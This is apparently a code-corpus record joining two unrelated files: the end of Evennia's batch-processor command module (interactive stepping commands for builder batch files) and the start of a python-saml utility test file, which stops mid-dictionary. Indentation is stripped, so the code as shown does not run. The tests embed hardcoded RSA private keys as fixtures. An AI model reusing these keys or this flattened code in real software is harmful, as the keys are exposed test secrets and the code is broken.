"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
nstack = len(stack)
if ptr + step <= 0:
caller.msg("{RBeginning of batch file.")
if ptr + step >= nstack:
caller.msg("{REnd of batch file.")
caller.ndb.batch_stackptr = max(0, min(nstack-1, ptr + step))
def show_curr(caller, showall=False):
"""
Show the current position in stack
"""
stackptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
if stackptr >= len(stack):
caller.ndb.batch_stackptr = len(stack) - 1
show_curr(caller, showall)
return
entry = stack[stackptr]
if type(entry) == dict:
# this is a batch-code entry
string = format_header(caller, entry['code'])
codeall = entry['code'].strip()
else:
# this is a batch-cmd entry
string = format_header(caller, entry)
codeall = entry.strip()
string += "{G(hh for help)"
if showall:
for line in codeall.split('\n'):
string += "\n{G|{n %s" % line
caller.msg(string)
def purge_processor(caller):
"""
This purges all effects running
on the caller.
"""
try:
del caller.ndb.batch_stack
del caller.ndb.batch_stackptr
del caller.ndb.batch_pythonpath
del caller.ndb.batch_batchmode
except:
pass
# clear everything but the default cmdset.
caller.cmdset.delete(BatchSafeCmdSet)
caller.cmdset.clear()
caller.scripts.validate() # this will purge interactive mode
#------------------------------------------------------------
# main access commands
#------------------------------------------------------------
class CmdBatchCommands(MuxCommand):
"""
Build from batch-command file
Usage:
@batchcommands[/interactive] <python.path.to.file>
Switch:
interactive - this mode will offer more control when
executing the batch file, like stepping,
skipping, reloading etc.
Runs batches of commands from a batch-cmd text file (*.ev).
"""
key = "@batchcommands"
aliases = ["@batchcommand", "@batchcmd"]
locks = "cmd:perm(batchcommands) or superuser()"
help_category = "Building"
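    # Example invocation (hypothetical path, shown for illustration only):
    #   @batchcommands/interactive contrib.tutorial_world.build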
def func(self):
"Starts the processor."
caller = self.caller
args = self.args
if not args:
caller.msg("Usage: @batchcommands[/interactive] <path.to.file>")
return
python_path = self.args
#parse indata file
try:
commands = BATCHCMD.parse_file(python_path)
except UnicodeDecodeError, err:
lnum = err.linenum
caller.msg(_UTF8_ERROR % (python_path, lnum))
return
if not commands:
string = "'%s' not found.\nYou have to supply the python path "
string += "of the file relative to \none of your batch-file directories (%s)."
caller.msg(string % (python_path, ", ".join(settings.BASE_BATCHPROCESS_PATHS)))
return
switches = self.switches
# Store work data in cache
caller.ndb.batch_stack = commands
caller.ndb.batch_stackptr = 0
caller.ndb.batch_pythonpath = python_path
caller.ndb.batch_batchmode = "batch_commands"
caller.cmdset.add(BatchSafeCmdSet)
if 'inter' in switches or 'interactive' in switches:
# Allow more control over how batch file is executed
# Set interactive state directly
caller.cmdset.add(BatchInteractiveCmdSet)
caller.msg("\nBatch-command processor - Interactive mode for %s ..." % python_path)
show_curr(caller)
else:
caller.msg("Running Batch-command processor - Automatic mode for %s (this might take some time) ..." % python_path)
procpool = False
if "PythonProcPool" in utils.server_services():
if utils.uses_database("sqlite3"):
caller.msg("Batchprocessor disabled ProcPool under SQLite3.")
else:
procpool=True
if procpool:
# run in parallel process
def callback(r):
caller.msg(" {GBatchfile '%s' applied." % python_path)
purge_processor(caller)
def errback(e):
caller.msg(" {RError from processor: '%s'" % e)
purge_processor(caller)
utils.run_async(_PROCPOOL_BATCHCMD_SOURCE, commands=commands, caller=caller, at_return=callback, at_err=errback)
else:
# run in-process (might block)
for inum in range(len(commands)):
# loop through the batch file
if not batch_cmd_exec(caller):
return
step_pointer(caller, 1)
# clean out the safety cmdset and clean out all other temporary attrs.
string = " Batchfile '%s' applied." % python_path
caller.msg("{G%s" % string)
purge_processor(caller)
class CmdBatchCode(MuxCommand):
"""
Build from batch-code file
Usage:
@batchcode[/interactive] <python path to file>
Switch:
interactive - this mode will offer more control when
executing the batch file, like stepping,
skipping, reloading etc.
       debug - auto-delete all objects that have been marked as
deletable in the script file (see example files for
               syntax). This is useful so as to not leave multiple
object copies behind when testing out the script.
Runs batches of commands from a batch-code text file (*.py).
"""
key = "@batchcode"
aliases = ["@batchcodes"]
locks = "cmd:superuser()"
help_category = "Building"
def func(self):
"Starts the processor."
caller = self.caller
args = self.args
if not args:
caller.msg("Usage: @batchcode[/interactive/debug] <path.to.file>")
return
python_path = self.args
#parse indata file
try:
codes = BATCHCODE.parse_file(python_path)
except UnicodeDecodeError, err:
lnum = err.linenum
caller.msg(_UTF8_ERROR % (python_path, lnum))
return
if not codes:
string = "'%s' not found.\nYou have to supply the python path "
string += "of the file relative to \nyour batch-file directories (%s)."
caller.msg(string % (python_path, ", ".join(settings.BASE_BATCHPROCESS_PATHS)))
return
switches = self.switches
debug = False
if 'debug' in switches:
debug = True
# Store work data in cache
caller.ndb.batch_stack = codes
caller.ndb.batch_stackptr = 0
caller.ndb.batch_pythonpath = python_path
caller.ndb.batch_batchmode = "batch_code"
caller.ndb.batch_debug = debug
caller.cmdset.add(BatchSafeCmdSet)
        if 'inter' in switches or 'interactive' in switches:
# Allow more control over how batch file is executed
# Set interactive state directly
caller.cmdset.add(BatchInteractiveCmdSet)
caller.msg("\nBatch-code processor - Interactive mode for %s ..." % python_path)
show_curr(caller)
else:
caller.msg("Running Batch-code processor - Automatic mode for %s ..." % python_path)
procpool = False
if "PythonProcPool" in utils.server_services():
if utils.uses_database("sqlite3"):
caller.msg("Batchprocessor disabled ProcPool under SQLite3.")
else:
procpool=True
if procpool:
# run in parallel process
def callback(r):
caller.msg(" {GBatchfile '%s' applied." % python_path)
purge_processor(caller)
def errback(e):
caller.msg(" {RError from processor: '%s'" % e)
purge_processor(caller)
utils.run_async(_PROCPOOL_BATCHCODE_SOURCE, codes=codes, caller=caller, at_return=callback, at_err=errback)
else:
                # run in-process (will block)
for inum in range(len(codes)):
# loop through the batch file
if not batch_code_exec(caller):
return
step_pointer(caller, 1)
# clean out the safety cmdset and clean out all other temporary attrs.
string = " Batchfile '%s' applied." % python_path
caller.msg("{G%s" % string)
purge_processor(caller)
#------------------------------------------------------------
# State-commands for the interactive batch processor modes
# (these are the same for both processors)
#------------------------------------------------------------
class CmdStateAbort(MuxCommand):
"""
@abort
This is a safety feature. It force-ejects us out of the processor and to
the default cmdset, regardless of what current cmdset the processor might
have put us in (e.g. when testing buggy scripts etc).
"""
key = "@abort"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
"Exit back to default."
purge_processor(self.caller)
        self.caller.msg("Exited processor and reset our active cmdset back to the default one.")
class CmdStateLL(MuxCommand):
"""
ll
Look at the full source for the current
command definition.
"""
key = "ll"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
show_curr(self.caller, showall=True)
class CmdStatePP(MuxCommand):
"""
pp
Process the currently shown command definition.
"""
key = "pp"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
"""
This checks which type of processor we are running.
"""
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
class CmdStateRR(MuxCommand):
"""
rr
Reload the batch file, keeping the current
position in it.
"""
key = "rr"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
new_data = BATCHCODE.parse_file(caller.ndb.batch_pythonpath)
else:
new_data = BATCHCMD.parse_file(caller.ndb.batch_pythonpath)
caller.ndb.batch_stack = new_data
caller.msg(format_code("File reloaded. Staying on same command."))
show_curr(caller)
class CmdStateRRR(MuxCommand):
"""
rrr
Reload the batch file, starting over
from the beginning.
"""
key = "rrr"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
BATCHCODE.parse_file(caller.ndb.batch_pythonpath)
else:
BATCHCMD.parse_file(caller.ndb.batch_pythonpath)
caller.ndb.batch_stackptr = 0
caller.msg(format_code("File reloaded. Restarting from top."))
show_curr(caller)
class CmdStateNN(MuxCommand):
"""
nn
Go to next command. No commands are executed.
"""
key = "nn"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
step_pointer(caller, step)
show_curr(caller)
class CmdStateNL(MuxCommand):
"""
nl
Go to next command, viewing its full source.
No commands are executed.
"""
key = "nl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateBB(MuxCommand):
"""
bb
Backwards to previous command. No commands
are executed.
"""
key = "bb"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = -int(self.args)
else:
step = -1
step_pointer(caller, step)
show_curr(caller)
class CmdStateBL(MuxCommand):
"""
bl
Backwards to previous command, viewing its full
source. No commands are executed.
"""
key = "bl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = -int(self.args)
else:
step = -1
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateSS(MuxCommand):
"""
ss [steps]
Process current command, then step to the next
one. If steps is given,
process this many commands.
"""
key = "ss"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
class CmdStateSL(MuxCommand):
"""
sl [steps]
Process current command, then step to the next
one, viewing its full source. If steps is given,
process this many commands.
"""
key = "sl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
class CmdStateCC(MuxCommand):
"""
cc
Continue to process all remaining
commands.
"""
key = "cc"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
nstack = len(caller.ndb.batch_stack)
ptr = caller.ndb.batch_stackptr
step = nstack - ptr
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
del caller.ndb.batch_stack
del caller.ndb.batch_stackptr
del caller.ndb.batch_pythonpath
del caller.ndb.batch_batchmode
caller.msg(format_code("Finished processing batch file."))
class CmdStateJJ(MuxCommand):
"""
    jj <command number>
Jump to specific command number
"""
    key = "jj"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
number = int(self.args)-1
else:
caller.msg(format_code("You must give a number index."))
return
ptr = caller.ndb.batch_stackptr
step = number - ptr
step_pointer(caller, step)
show_curr(caller)
class CmdStateJL(MuxCommand):
"""
jl <command number>
Jump to specific command number and view its full source.
"""
key = "jl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
number = int(self.args)-1
else:
caller.msg(format_code("You must give a number index."))
return
ptr = caller.ndb.batch_stackptr
step = number - ptr
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateQQ(MuxCommand):
"""
qq
Quit the batchprocessor.
"""
key = "qq"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
purge_processor(self.caller)
self.caller.msg("Aborted interactive batch mode.")
class CmdStateHH(MuxCommand):
"Help command"
key = "hh"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
string = """
Interactive batch processing commands:
nn [steps] - next command (no processing)
nl [steps] - next & look
bb [steps] - back to previous command (no processing)
bl [steps] - back & look
jj <N> - jump to command nr N (no processing)
jl <N> - jump & look
pp - process currently shown command (no step)
ss [steps] - process & step
sl [steps] - process & step & look
ll - look at full definition of current command
rr - reload batch file (stay on current)
rrr - reload batch file (start from first)
hh - this help list
cc - continue processing to end, then quit.
qq - quit (abort all remaining commands)
@abort - this is a safety command that always is available
regardless of what cmdsets gets added to us during
batch-command processing. It immediately shuts down
the processor and returns us to the default cmdset.
"""
self.caller.msg(string)
#------------------------------------------------------------
#
# Defining the cmdsets for the interactive batchprocessor
# mode (same for both processors)
#
#------------------------------------------------------------
class BatchSafeCmdSet(CmdSet):
"""
The base cmdset for the batch processor.
This sets a 'safe' @abort command that will
always be available to get out of everything.
"""
key = "Batch_default"
priority = 104 # override other cmdsets.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdStateAbort())
class BatchInteractiveCmdSet(CmdSet):
"""
The cmdset for the interactive batch processor mode.
"""
key = "Batch_interactive"
priority = 104
def at_cmdset_creation(self):
"init the cmdset"
self.add(CmdStateAbort())
self.add(CmdStateLL())
self.add(CmdStatePP())
self.add(CmdStateRR())
self.add(CmdStateRRR())
self.add(CmdStateNN())
self.add(CmdStateNL())
self.add(CmdStateBB())
self.add(CmdStateBL())
self.add(CmdStateSS())
self.add(CmdStateSL())
self.add(CmdStateCC())
self.add(CmdStateJJ())
self.add(CmdStateJL())
self.add(CmdStateQQ())
self.add(CmdStateHH())
|
TaliesinSkye/evennia
|
src/commands/default/batchprocess.py
|
Python
|
bsd-3-clause
| 24,488
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014, OneLogin, Inc.
# All rights reserved.
from base64 import b64decode
import json
from lxml import etree
from os.path import dirname, join, exists
import unittest
from xml.dom.minidom import parseString
from onelogin.saml2 import compat
from onelogin.saml2.constants import OneLogin_Saml2_Constants
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from onelogin.saml2.utils import OneLogin_Saml2_Utils
class OneLogin_Saml2_Utils_Test(unittest.TestCase):
data_path = join(dirname(__file__), '..', '..', '..', 'data')
def loadSettingsJSON(self, filename=None):
if filename:
filename = join(dirname(__file__), '..', '..', '..', 'settings', filename)
else:
filename = join(dirname(__file__), '..', '..', '..', 'settings', 'settings1.json')
if exists(filename):
stream = open(filename, 'r')
settings = json.load(stream)
stream.close()
return settings
else:
raise Exception('Settings json file does not exist')
def file_contents(self, filename):
f = open(filename, 'r')
content = f.read()
f.close()
return content
def testFormatCert(self):
"""
Tests the format_cert method of the OneLogin_Saml2_Utils
"""
settings_info = self.loadSettingsJSON()
cert = settings_info['idp']['x509cert']
self.assertNotIn('-----BEGIN CERTIFICATE-----', cert)
self.assertNotIn('-----END CERTIFICATE-----', cert)
self.assertEqual(len(cert), 860)
formated_cert1 = OneLogin_Saml2_Utils.format_cert(cert)
self.assertIn('-----BEGIN CERTIFICATE-----', formated_cert1)
self.assertIn('-----END CERTIFICATE-----', formated_cert1)
formated_cert2 = OneLogin_Saml2_Utils.format_cert(cert, True)
self.assertEqual(formated_cert1, formated_cert2)
formated_cert3 = OneLogin_Saml2_Utils.format_cert(cert, False)
self.assertNotIn('-----BEGIN CERTIFICATE-----', formated_cert3)
self.assertNotIn('-----END CERTIFICATE-----', formated_cert3)
self.assertEqual(len(formated_cert3), 860)
def testFormatPrivateKey(self):
"""
Tests the format_private_key method of the OneLogin_Saml2_Utils
"""
key = "-----BEGIN RSA PRIVATE KEY-----\nMIICXgIBAAKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9\nIbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+\nPbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQAB\nAoGAD4/Z4LWVWV6D1qMIp1Gzr0ZmdWTE1SPdZ7Ej8glGnCzPdguCPuzbhGXmIg0V\nJ5D+02wsqws1zd48JSMXXM8zkYZVwQYIPUsNn5FetQpwxDIMPmhHg+QNBgwOnk8J\nK2sIjjLPL7qY7Itv7LT7Gvm5qSOkZ33RCgXcgz+okEIQMYkCQQDzbTOyDL0c5WQV\n6A2k06T/azdhUdGXF9C0+WkWSfNaovmTgRXh1G+jMlr82Snz4p4/STt7P/XtyWzF\n3pkVgZr3AkEA7nPjXwHlttNEMo6AtxHd47nizK2NUN803ElIUT8P9KSCoERmSXq6\n6PDekGNic4ldpsSvOeYCk8MAYoDBy9kvVwJBAMLgX4xg6lzhv7hR5+pWjTb1rIY6\nrCHbrPfU264+UZXz9v2BT/VUznLF81WMvStD9xAPHpFS6R0OLghSZhdzhI0CQQDL\n8Duvfxzrn4b9QlmduV8wLERoT6rEVxKLsPVz316TGrxJvBZLk/cV0SRZE1cZf4uk\nXSWMfEcJ/0Zt+LdG1CqjAkEAqwLSglJ9Dy3HpgMz4vAAyZWzAxvyA1zW0no9GOLc\nPQnYaNUN/Fy2SYtETXTb0CQ9X1rt8ffkFP7ya+5TC83aMg==\n-----END RSA PRIVATE KEY-----\n"
formated_key = OneLogin_Saml2_Utils.format_private_key(key, True)
self.assertIn('-----BEGIN RSA PRIVATE KEY-----', formated_key)
self.assertIn('-----END RSA PRIVATE KEY-----', formated_key)
self.assertEqual(len(formated_key), 891)
formated_key = OneLogin_Saml2_Utils.format_private_key(key, False)
self.assertNotIn('-----BEGIN RSA PRIVATE KEY-----', formated_key)
self.assertNotIn('-----END RSA PRIVATE KEY-----', formated_key)
self.assertEqual(len(formated_key), 816)
key_2 = "-----BEGIN PRIVATE KEY-----\nMIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAM62buSW9Zgh7CmZ\nouJekK0ac9sgEZkspemjv7SyE6Hbdz+KmUr3C7MI6JuPfVyJbxvMDf3FbgBBK7r5\nyfGgehXwplLMZj8glvV3NkdLMLPWmaw9U5sOzRoym46pVvsEo1PUL2qDK5Wrsm1g\nuY1KIDSHL59NQ7PzDKgm1dxioeXFAgMBAAECgYA/fvRzTReloo3rfWD2Tfv84EpE\nPgaJ2ZghO4Zwl97F8icgIo/R4i760Lq6xgnI+gJiNHz7vcB7XYl0RrRMf3HgbA7z\npJxREmOVltESDHy6lH0TmCdv9xMmHltB+pbGOhqBvuGgFbEOR73lDDV0ln2rEITJ\nA2zjYF+hWe8b0JFeQQJBAOsIIIlHAMngjhCQDD6kla/vce972gCFU7ZeFw16ZMmb\n8W4rGRfQoQWYxSLAFIFsYewSBTccanyYbBNe3njki3ECQQDhJ4cgV6VpTwez4dkp\nU/xCHKoReedAEJhXucTNGpiIqu+TDgIz9aRbrgnUKkS1s06UJhcDRTl/+pCSRRt/\nCA2VAkBkPw4pn1hNwvK1S8t9OJQD+5xcKjZcvIFtKoqonAi7GUGL3OQSDVFw4q1K\n2iSk40aM+06wJ/WfeR+3z2ISrGBxAkAJ20YiF1QpcQlASbHNCl0vs7uKOlDyUAer\nR3mjFPf6e6kzQdi815MTZGIPxK3vWmMlPymgvgYPYTO1A4t5myulAkEA1QioAWcJ\noO26qhUlFRBCR8BMJoVPImV7ndVHE7usHdJvP7V2P9RyuRcMCTVul8RRmyoh/+yG\n4ghMaHo/v0YY5Q==\n-----END PRIVATE KEY-----\n"
formated_key_2 = OneLogin_Saml2_Utils.format_private_key(key_2, True)
self.assertIn('-----BEGIN PRIVATE KEY-----', formated_key_2)
self.assertIn('-----END PRIVATE KEY-----', formated_key_2)
self.assertEqual(len(formated_key_2), 916)
formated_key_2 = OneLogin_Saml2_Utils.format_private_key(key_2, False)
self.assertNotIn('-----BEGIN PRIVATE KEY-----', formated_key_2)
self.assertNotIn('-----END PRIVATE KEY-----', formated_key_2)
self.assertEqual(len(formated_key_2), 848)
key_3 = 'MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAM62buSW9Zgh7CmZouJekK0ac9sgEZkspemjv7SyE6Hbdz+KmUr3C7MI6JuPfVyJbxvMDf3FbgBBK7r5yfGgehXwplLMZj8glvV3NkdLMLPWmaw9U5sOzRoym46pVvsEo1PUL2qDK5Wrsm1guY1KIDSHL59NQ7PzDKgm1dxioeXFAgMBAAECgYA/fvRzTReloo3rfWD2Tfv84EpEPgaJ2ZghO4Zwl97F8icgIo/R4i760Lq6xgnI+gJiNHz7vcB7XYl0RrRMf3HgbA7zpJxREmOVltESDHy6lH0TmCdv9xMmHltB+pbGOhqBvuGgFbEOR73lDDV0ln2rEITJA2zjYF+hWe8b0JFeQQJBAOsIIIlHAMngjhCQDD6kla/vce972gCFU7ZeFw16ZMmb8W4rGRfQoQWYxSLAFIFsYewSBTccanyYbBNe3njki3ECQQDhJ4cgV6VpTwez4dkpU/xCHKoReedAEJhXucTNGpiIqu+TDgIz9aRbrgnUKkS1s06UJhcDRTl/+pCSRRt/CA2VAkBkPw4pn1hNwvK1S8t9OJQD+5xcKjZcvIFtKoqonAi7GUGL3OQSDVFw4q1K2iSk40aM+06wJ/WfeR+3z2ISrGBxAkAJ20YiF1QpcQlASbHNCl0vs7uKOlDyUAerR3mjFPf6e6kzQdi815MTZGIPxK3vWmMlPymgvgYPYTO1A4t5myulAkEA1QioAWcJoO26qhUlFRBCR8BMJoVPImV7ndVHE7usHdJvP7V2P9RyuRcMCTVul8RRmyoh/+yG4ghMaHo/v0YY5Q=='
formated_key_3 = OneLogin_Saml2_Utils.format_private_key(key_3, True)
self.assertIn('-----BEGIN RSA PRIVATE KEY-----', formated_key_3)
self.assertIn('-----END RSA PRIVATE KEY-----', formated_key_3)
self.assertEqual(len(formated_key_3), 924)
formated_key_3 = OneLogin_Saml2_Utils.format_private_key(key_3, False)
self.assertNotIn('-----BEGIN PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----END PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----BEGIN RSA PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----END RSA PRIVATE KEY-----', formated_key_3)
self.assertEqual(len(formated_key_3), 848)
def testRedirect(self):
"""
Tests the redirect method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
# Check relative and absolute
hostname = OneLogin_Saml2_Utils.get_self_host(request_data)
url = 'http://%s/example' % hostname
url2 = '/example'
target_url = OneLogin_Saml2_Utils.redirect(url, {}, request_data)
target_url2 = OneLogin_Saml2_Utils.redirect(url2, {}, request_data)
self.assertEqual(target_url, target_url2)
        # Check that it accepts http/https and rejects other protocols
url3 = 'https://%s/example?test=true' % hostname
url4 = 'ftp://%s/example' % hostname
target_url3 = OneLogin_Saml2_Utils.redirect(url3, {}, request_data)
self.assertIn('test=true', target_url3)
self.assertRaisesRegexp(Exception, 'Redirect to invalid URL',
OneLogin_Saml2_Utils.redirect, url4, {}, request_data)
# Review parameter prefix
parameters1 = {
'value1': 'a'
}
target_url5 = OneLogin_Saml2_Utils.redirect(url, parameters1, request_data)
self.assertEqual('http://%s/example?value1=a' % hostname, target_url5)
target_url6 = OneLogin_Saml2_Utils.redirect(url3, parameters1, request_data)
self.assertEqual('https://%s/example?test=true&value1=a' % hostname, target_url6)
# Review parameters
parameters2 = {
'alphavalue': 'a',
'numvaluelist': ['1', '2'],
'testing': None
}
target_url7 = OneLogin_Saml2_Utils.redirect(url, parameters2, request_data)
parameters2_decoded = {"alphavalue": "alphavalue=a", "numvaluelist": "numvaluelist[]=1&numvaluelist[]=2", "testing": "testing"}
parameters2_str = "&".join(parameters2_decoded[x] for x in parameters2)
self.assertEqual('http://%s/example?%s' % (hostname, parameters2_str), target_url7)
parameters3 = {
'alphavalue': 'a',
'emptynumvaluelist': [],
'numvaluelist': [''],
}
parameters3_decoded = {"alphavalue": "alphavalue=a", "numvaluelist": "numvaluelist[]="}
parameters3_str = "&".join((parameters3_decoded[x] for x in parameters3.keys() if x in parameters3_decoded))
target_url8 = OneLogin_Saml2_Utils.redirect(url, parameters3, request_data)
self.assertEqual('http://%s/example?%s' % (hostname, parameters3_str), target_url8)
def testGetselfhost(self):
"""
Tests the get_self_host method of the OneLogin_Saml2_Utils
"""
request_data = {}
self.assertRaisesRegexp(Exception, 'No hostname defined',
OneLogin_Saml2_Utils.get_self_host, request_data)
request_data = {
'server_name': 'example.com'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com:443'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com:ok'
}
self.assertEqual('example.com:ok', OneLogin_Saml2_Utils.get_self_host(request_data))
def testisHTTPS(self):
"""
Tests the is_https method of the OneLogin_Saml2_Utils
"""
request_data = {
'https': 'off'
}
self.assertFalse(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'https': 'on'
}
self.assertTrue(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'server_port': '80'
}
self.assertFalse(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'server_port': '443'
}
self.assertTrue(OneLogin_Saml2_Utils.is_https(request_data))
def testGetSelfURLhost(self):
"""
Tests the get_self_url_host method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
self.assertEqual('http://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '80'
self.assertEqual('http://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '81'
self.assertEqual('http://example.com:81', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '443'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
del request_data['server_port']
request_data['https'] = 'on'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '444'
self.assertEqual('https://example.com:444', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '443'
request_data['request_uri'] = ''
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = '/'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = 'onelogin/'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = '/onelogin'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = 'https://example.com/onelogin/sso'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data2 = {
'request_uri': 'example.com/onelogin/sso'
}
self.assertRaisesRegexp(Exception, 'No hostname defined',
OneLogin_Saml2_Utils.get_self_url_host, request_data2)
def testGetSelfURL(self):
"""
Tests the get_self_url method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data)
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = ''
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/'
self.assertEqual(url + '/', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = 'index.html'
self.assertEqual(url + 'index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '?index.html'
self.assertEqual(url + '?index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/index.html'
self.assertEqual(url + '/index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/index.html?testing'
self.assertEqual(url + '/index.html?testing', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/test/index.html?testing'
self.assertEqual(url + '/test/index.html?testing', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = 'https://example.com/testing'
self.assertEqual(url + '/testing', OneLogin_Saml2_Utils.get_self_url(request_data))
def testGetSelfURLNoQuery(self):
"""
Tests the get_self_url_no_query method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com',
'script_name': '/index.html'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data) + request_data['script_name']
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url_no_query(request_data))
request_data['path_info'] = '/test'
self.assertEqual(url + '/test', OneLogin_Saml2_Utils.get_self_url_no_query(request_data))
def testGetSelfRoutedURLNoQuery(self):
"""
Tests the get_self_routed_url_no_query method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com',
'request_uri': '/example1/route?x=test',
'query_string': '?x=test'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data) + '/example1/route'
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data))
request_data_2 = {
'http_host': 'example.com',
'request_uri': '',
}
url_2 = OneLogin_Saml2_Utils.get_self_url_host(request_data_2)
self.assertEqual(url_2, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_2))
request_data_3 = {
'http_host': 'example.com',
}
url_3 = OneLogin_Saml2_Utils.get_self_url_host(request_data_3)
self.assertEqual(url_3, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_3))
request_data_4 = {
'http_host': 'example.com',
'request_uri': '/example1/route/test/',
'query_string': '?invalid=1'
}
url_4 = OneLogin_Saml2_Utils.get_self_url_host(request_data_4) + '/example1/route/test/'
self.assertEqual(url_4, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_4))
request_data_5 = {
'http_host': 'example.com',
'request_uri': '/example1/route/test/',
'query_string': ''
}
url_5 = OneLogin_Saml2_Utils.get_self_url_host(request_data_5) + '/example1/route/test/'
self.assertEqual(url_5, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_5))
request_data_6 = {
